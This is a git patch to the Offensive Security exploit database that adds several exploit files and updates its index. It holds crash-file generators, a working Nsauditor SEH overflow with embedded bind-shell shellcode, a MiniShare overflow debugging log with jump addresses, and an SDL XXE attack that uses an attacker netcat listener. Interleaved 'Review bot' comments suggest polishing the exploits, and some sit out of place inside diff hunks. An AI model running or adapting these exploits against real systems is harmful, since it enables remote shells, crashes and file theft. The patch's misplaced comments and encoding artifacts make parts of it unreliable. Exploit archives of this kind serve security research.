From c6ebf8bc236af0b9ee3c383c03282c0f01a37f01 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 19 Dec 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-12-19 10 changes to exploits/shellcodes VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC) Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write AnyBurn 4.3 - Local Buffer Overflow Denial of Service Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service MegaPing - Local Buffer Overflow Denial of Service Exim 4.41 - 'dns_build_reverse' Local Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2) Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2) Microsoft Windows Server 2003 - Token Kidnapping Local Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation VMware Fusion 2.0.5 - vmx86 kext Local Nsauditor 3.0.28.0 - Local SEH Buffer Overflow Google Android 2.0 < 2.1 - Reverse Shell Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP) MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method SDL Web Content Manager 8.5.0 - XML External Entity Injection --- exploits/osx/{local => dos}/10078.c | 0 exploits/windows/dos/46001.html | 149 ++++++++++++++++ exploits/windows/dos/46002.py | 28 +++ exploits/windows/dos/46003.py | 28 +++ exploits/windows/dos/46004.py | 28 +++ exploits/windows/local/46005.py | 65 +++++++ exploits/windows/remote/45999.txt | 263 ++++++++++++++++++++++++++++ exploits/xml/webapps/46000.txt | 33 ++++ files_exploits.csv | 17 +- 9 files changed, 606 insertions(+), 5 deletions(-) rename exploits/osx/{local => dos}/10078.c (100%) create mode 100644 exploits/windows/dos/46001.html create mode 100755 exploits/windows/dos/46002.py create mode 100755 exploits/windows/dos/46003.py create mode 100755 exploits/windows/dos/46004.py create mode 100755 exploits/windows/local/46005.py create mode 100644 exploits/windows/remote/45999.txt create mode 100644 exploits/xml/webapps/46000.txt 
diff --git a/exploits/osx/local/10078.c b/exploits/osx/dos/10078.c
similarity index 100%
rename from exploits/osx/local/10078.c
rename to exploits/osx/dos/10078.c
diff --git a/exploits/windows/dos/46001.html b/exploits/windows/dos/46001.html
new file mode 100644
index 000000000..d6aacb53b
--- /dev/null
+++ b/exploits/windows/dos/46001.html
@@ -0,0 +1,149 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/dos/46002.py b/exploits/windows/dos/46002.py
new file mode 100755
index 000000000..4757cb322
--- /dev/null
+++ b/exploits/windows/dos/46002.py
@@ -0,0 +1,28 @@
+# Exploit Title: AnyBurn
+# Date: 15-12-2018=20
+# Vendor Homepage: http://www.anyburn.com/
+# Software Link : http://www.anyburn.com/anyburn_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 4.3 (32-bit)
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+=20
+# Steps to Produce the Crash:=20
+# 1.- Run python code : AnyBurn.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open AnyBurn choose 'Copy disk to Image'
+# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
+# 5.- Click 'Create Now' and you will see a crash.
+
+#!/usr/bin/env python
+
+buffer =3D "\x41" * 10000
+
+try:
+=09f=3Dopen("Evil.txt","w")
+=09print "[+] Creating %s bytes evil payload.." %len(buffer)
+=09f.write(buffer)
+=09f.close()
+=09print "[+] File created!"
+except:
+=09print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46003.py b/exploits/windows/dos/46003.py
new file mode 100755
index 000000000..7e79ec230
--- /dev/null
+++ b/exploits/windows/dos/46003.py
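Review bot: The code lines of the added 46002.py carry quoted-printable escapes — `buffer =3D "\x41" * 10000` and the `=09`-indented body of the `try` block — so if that is the stored content the script stops with a SyntaxError before it writes anything; the corresponding lines in 46003.py and 46004.py are plain `=` and whitespace indentation, which is presumably what was intended here as well. Separately, the `#!/usr/bin/env python` line sits at line 17, after the comment header, where the loader does not honour it; it belongs on line 1. The bare `except:` on the last two lines swallows every exception, including KeyboardInterrupt, and replaces the real cause (typically a permission or path error from `open`) with a fixed message; `except IOError as e:` followed by `print "File cannot be created: %s" % e` keeps the reason. The same shebang placement and bare `except:` appear in 46003.py, 46004.py and 46005.py.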
@@ -0,0 +1,28 @@
+# Exploit Title: Excel Password Recovery Professional
+# Date: 15-12-2018
+# Vendor Homepage:https://www.recoverlostpassword.com/
+# Software Link :https://www.recoverlostpassword.com/downloads/excel_password_recovery_pro_trial.exe
+# Exploit Author: Achilles
+# Tested Version: 8.2.0.0
+# Tested on: Windows 7 64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run python code : Excel_Password_Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Excel Password Recovery Professional
+# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Registrations Code'
+# 5.- Click 'Register' and you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 5000
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46004.py b/exploits/windows/dos/46004.py
new file mode 100755
index 000000000..53fd7c756
--- /dev/null
+++ b/exploits/windows/dos/46004.py
@@ -0,0 +1,28 @@
+# Exploit Title: MegaPing
+# Date: 15-12-2018
+# Vendor Homepage: http://www.magnetosoft.com/
+# Software Link: http://www.magnetosoft.com/downloads/win32/megaping_setup.exe
+# Exploit Author: Achilles
+# Tested Version:
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run python code : MegaPing.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open MegaPing choose from the left side: 'Finger'
+# 4.- Paste the content of EVIL.txt into the field: 'Destination Address List'
+# 5.- Click 'Start' and you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 8000
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46005.py b/exploits/windows/local/46005.py
new file mode 100755
index 000000000..2de8d5a66
--- /dev/null
+++ b/exploits/windows/local/46005.py
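Review bot: The `# Tested Version:` field of 46004.py is left empty, and the matching files_exploits.csv row (`MegaPing - Local Buffer Overflow Denial of Service`) carries no version either, so a reader cannot tell which MegaPing build was observed to crash on the 8000-byte 'Destination Address List' input; the other new scripts in this commit all record one. Fill it in, e.g. `# Tested Version: <version tested>`, or state explicitly that the build could not be determined, and carry the same version into the CSV description.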
@@ -0,0 +1,65 @@
+# Exploit Title: Nsauditor Local SEH Buffer Overflow
+# Date: 15-12-2018
+# Vendor Homepage:http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 3.0.28.0
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : Nsauditor.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Nsauditor
+# 4.- In the Window select 'Tools' > 'Dns Lookup'
+# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
+# 6.- Click 'Resolve'
+# 7.- Connect with Netcat on port 3110
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5235
+NSEH = "\xeb\x06\x90\x90" #jmp short 6
+SEH = "\x30\xFF\xE6\x01" #nsnetutils.dll
+nops = "\x90" * 20
+
+#badchar \x00\x0a\x0d\x2e
+#msfvenom Bind port 3110
+buf = ""
+buf += "\xd9\xc7\xb8\x8e\xe7\x77\xf1\xd9\x74\x24\xf4\x5b\x29"
+buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x43\x13\x03\xcd\xf4\x95"
+buf += "\x04\x2d\x12\xdb\xe7\xcd\xe3\xbc\x6e\x28\xd2\xfc\x15"
+buf += "\x39\x45\xcd\x5e\x6f\x6a\xa6\x33\x9b\xf9\xca\x9b\xac"
+buf += "\x4a\x60\xfa\x83\x4b\xd9\x3e\x82\xcf\x20\x13\x64\xf1"
+buf += "\xea\x66\x65\x36\x16\x8a\x37\xef\x5c\x39\xa7\x84\x29"
+buf += "\x82\x4c\xd6\xbc\x82\xb1\xaf\xbf\xa3\x64\xbb\x99\x63"
+buf += "\x87\x68\x92\x2d\x9f\x6d\x9f\xe4\x14\x45\x6b\xf7\xfc"
+buf += "\x97\x94\x54\xc1\x17\x67\xa4\x06\x9f\x98\xd3\x7e\xe3"
+buf += "\x25\xe4\x45\x99\xf1\x61\x5d\x39\x71\xd1\xb9\xbb\x56"
+buf += "\x84\x4a\xb7\x13\xc2\x14\xd4\xa2\x07\x2f\xe0\x2f\xa6"
+buf += "\xff\x60\x6b\x8d\xdb\x29\x2f\xac\x7a\x94\x9e\xd1\x9c"
+buf += "\x77\x7e\x74\xd7\x9a\x6b\x05\xba\xf2\x58\x24\x44\x03"
+buf += "\xf7\x3f\x37\x31\x58\x94\xdf\x79\x11\x32\x18\x7d\x08"
+buf += "\x82\xb6\x80\xb3\xf3\x9f\x46\xe7\xa3\xb7\x6f\x88\x2f"
+buf += "\x47\x8f\x5d\xc5\x4f\x36\x0e\xf8\xb2\x88\xfe\xbc\x1c"
+buf += "\x61\x15\x33\x43\x91\x16\x99\xec\x3a\xeb\x22\x1e\x9d"
+buf += "\x62\xc4\x74\xf1\x22\x5e\xe0\x33\x11\x57\x97\x4c\x73"
+buf += "\xcf\x3f\x04\x95\xc8\x40\x95\xb3\x7e\xd6\x1e\xd0\xba"
+buf += "\xc7\x20\xfd\xea\x90\xb7\x8b\x7a\xd3\x26\x8b\x56\x83"
+buf += "\xcb\x1e\x3d\x53\x85\x02\xea\x04\xc2\xf5\xe3\xc0\xfe"
+buf += "\xac\x5d\xf6\x02\x28\xa5\xb2\xd8\x89\x28\x3b\xac\xb6"
+buf += "\x0e\x2b\x68\x36\x0b\x1f\x24\x61\xc5\xc9\x82\xdb\xa7"
+buf += "\xa3\x5c\xb7\x61\x23\x18\xfb\xb1\x35\x25\xd6\x47\xd9"
+buf += "\x94\x8f\x11\xe6\x19\x58\x96\x9f\x47\xf8\x59\x4a\xcc"
+buf += "\x08\x10\xd6\x65\x81\xfd\x83\x37\xcc\xfd\x7e\x7b\xe9"
+buf += "\x7d\x8a\x04\x0e\x9d\xff\x01\x4a\x19\xec\x7b\xc3\xcc"
+buf += "\x12\x2f\xe4\xc4"
+
+payload = buffer + NSEH + SEH + nops + buf
+try:
+ f=open("EVIL.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/remote/45999.txt b/exploits/windows/remote/45999.txt
new file mode 100644
index 000000000..5cd7abe2d
--- /dev/null
+++ b/exploits/windows/remote/45999.txt
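Review bot: `SEH = "\x30\xFF\xE6\x01" #nsnetutils.dll` names only the module, not that the value is tied to the build in `# Tested Version: 3.0.28.0` on the Windows XP SP3 test host, so anyone comparing against another build gets no hint that it has to be re-derived rather than reused; suggest `#nsnetutils.dll as shipped with 3.0.28.0 on XP SP3 - version-specific`. The step `# 7.- Connect with Netcat on port 3110` and the `#msfvenom Bind port 3110` line are the only statements of what `buf` does; a comment above `buf = ""` saying that, per the msfvenom note, the blob is a bind payload that listens on TCP 3110 on the host running Nsauditor would make the observable effect explicit for anyone triaging this file. `buffer` shadows the Python 2 builtin of the same name; `padding` reads better. The bare `except:` at the end hides the actual reason when `open` fails; `except IOError as e:` with the error included in the message keeps it. The 46005.py hunk starts on the previous physical line.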
@@ -0,0 +1,263 @@
+Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
+methods are also vulnerable. The difference is minimal, both are exploited
+in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
+
+-------------------------------------------------------------------
+
+EAX 00000000
+ECX 77C3EF3B msvcrt.77C3EF3B
+EDX 00F14E38
+EBX 43346843
+ESP 01563908 ASCII
+"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
+HTTP/1.1
+"
+EBP 0156BB90
+ESI 00000001
+EDI 01565B68
+EIP 68433568
+C 0 ES 0023 32bit 0(FFFFFFFF)
+P 1 CS 001B 32bit 0(FFFFFFFF)
+A 1 SS 0023 32bit 0(FFFFFFFF)
+Z 0 DS 0023 32bit 0(FFFFFFFF)
+S 0 FS 003B 32bit 7FFDD000(FFF)
+T 0 GS 0000 NULL
+D 0
+O 0 LastErr ERROR_SUCCESS (00000000)
+EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+ 3 2 1 0 E S P U O Z D I
+FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
+FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
+
+------------------------------------------------------------------------------
+
+Only 210 bytes to shellcode
+
+------------------------------------------------------------------------------
+
+Badchars '00','0d'
+
+------------------------------------------------------------------------------
+
+>findjmp kernel32.dll esp - XP SP 3 English
+
+Scanning kernel32.dll for code useable with the esp register
+0x7C809F83 call esp
+0x7C8369E0 call esp
+0x7C83C2C5 push esp - ret
+0x7C87641B call esp
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/xml/webapps/46000.txt b/exploits/xml/webapps/46000.txt
new file mode 100644
index 000000000..24bc8698b
--- /dev/null
+++ b/exploits/xml/webapps/46000.txt
@@ -0,0 +1,33 @@
+######################
+# Author Information #
+######################
+Author : Ahmed Elhady Mohamed
+twitter : @Ahmed__ELhady
+Company : Canon Security
+Date : 25/11/2018
+########################
+# Software Information #
+########################
+Affected Software : SDL Web Content Manager
+Version: Build 8.5.0
+Vendor: SDL Tridion
+Software website : https://www.sdl.com
+CVE Number: CVE-2018-19371
+###############
+# Description #
+###############
+SDL Web Content Manager build 8.5.0 is vulnerable to XXE vulnerability in SaveUserSettings web service. SaveUserSettings web service takes XML values as a parameter. The webservices allows and accepts XML external entity which allows an attacker to read sensitive files from the server. Moreover it can be used to perform network port scanning to internal network.
+#################
+# Exploit Steps #
+#################
+1- Access the application with any user account
+2- it will ask you to choose your language preferences
+3-the application sent a request to SaveUserSettings web service with XML content in the request body.
+4- open a port listener on the attacker server using netcat tool as the following: nc -lvp 80
+5- intercept the request using Burpsuite proxy tool
+6- inject the following payload in the beginning of the XML value.
+%asd;%c;]>
+&rrr;
+7- The injected payload allows the server to fetch the xxe1.dtd resource from the hacker server.
+8- send the request to the server.
+9- The application server will connect to the attacker server
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f52de96a6..8dd0eeddd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1247,6 +1247,7 @@ id,file,description,date,author,type,platform,port
 10068,exploits/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",dos,windows,
 10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21
 10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389
+10078,exploits/osx/dos/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)",2009-10-02,mu-b,dos,osx,
 33476,exploits/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,dos,hardware,
 10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515
 10092,exploits/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,dos,windows,
@@ -6215,6 +6216,10 @@ id,file,description,date,author,type,platform,port
 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
 45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
 45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
+46001,exploits/windows/dos/46001.html,"Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write",2018-12-18,"Google Security Research",dos,windows,
+46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
+46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
+46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
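Review bot: The added 46003 row spells the product `Exel Password Recovery 8.2.0.0`, while the file it indexes (exploits/windows/dos/46003.py) titles itself `Excel Password Recovery Professional`, so an index search for "Excel" misses the entry. Change the row to `46003,exploits/windows/dos/46003.py,"Excel Password Recovery Professional 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,`. The commit subject repeats the misspelling and would need the same correction.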
@@ -6376,7 +6381,7 @@ id,file,description,date,author,type,platform,port
 741,exploits/linux/local/741.pl,"HTGET 0.9.x - Local Privilege Escalation",2005-01-05,nekd0,local,linux,
 744,exploits/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)",2005-01-07,"Paul Starzetz",local,linux,
 749,exploits/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",local,windows,
-756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local",2005-01-15,"Rafael Carrasco",local,linux,
+756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow",2005-01-15,"Rafael Carrasco",local,linux,
 758,exploits/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,local,osx,
 760,exploits/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,local,windows,
 763,exploits/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,local,linux,79
@@ -6432,7 +6437,7 @@ id,file,description,date,author,type,platform,port
 937,exploits/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,local,windows,
 938,exploits/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution (MS05-016)",2005-04-14,ZwelL,local,windows,
 950,exploits/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,local,linux,
-951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)",2005-04-22,"Jean Luc",local,windows,
+951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)",2005-04-22,"Jean Luc",local,windows,
 963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,
 964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows,
 965,exploits/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,local,windows,
@@ -6795,7 +6800,7 @@ id,file,description,date,author,type,platform,port
 6333,exploits/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,local,windows,
 6337,exploits/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation",2008-08-31,RoMaNSoFt,local,linux,
 6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows,
-6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local",2008-10-08,"Cesar Cerrudo",local,windows,
+6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,
 6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows,
 6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows,
 6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow",2008-10-21,"Guido Landi",local,windows,
@@ -7134,7 +7139,6 @@ id,file,description,date,author,type,platform,port
 10060,exploits/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",local,linux,
 10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",local,multiple,
 10076,exploits/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,local,osx,
-10078,exploits/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local",2009-10-02,mu-b,local,osx,
 33426,exploits/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",local,windows,
 10084,exploits/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",local,windows,
 10201,exploits/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,local,windows,
@@ -10149,6 +10153,7 @@ id,file,description,date,author,type,platform,port
 45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
 45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
+46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -11779,7 +11784,7 @@ id,file,description,date,author,type,platform,port
 15371,exploits/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,remote,windows,
 15373,exploits/windows/remote/15373.txt,"Mongoose Web Server 2.11 - Directory Traversal",2010-11-01,nitr0us,remote,windows,
 15421,exploits/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,remote,windows,
-15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell",2010-11-05,"MJ Keith",remote,android,
+15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)",2010-11-05,"MJ Keith",remote,android,
 15427,exploits/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows,
 15437,exploits/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows,
 15438,exploits/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",remote,windows,
@@ -17008,6 +17013,7 @@ id,file,description,date,author,type,platform,port
 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
+45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40494,3 +40500,4 @@ id,file,description,date,author,type,platform,port
 45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
 45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
 45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,
+46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml,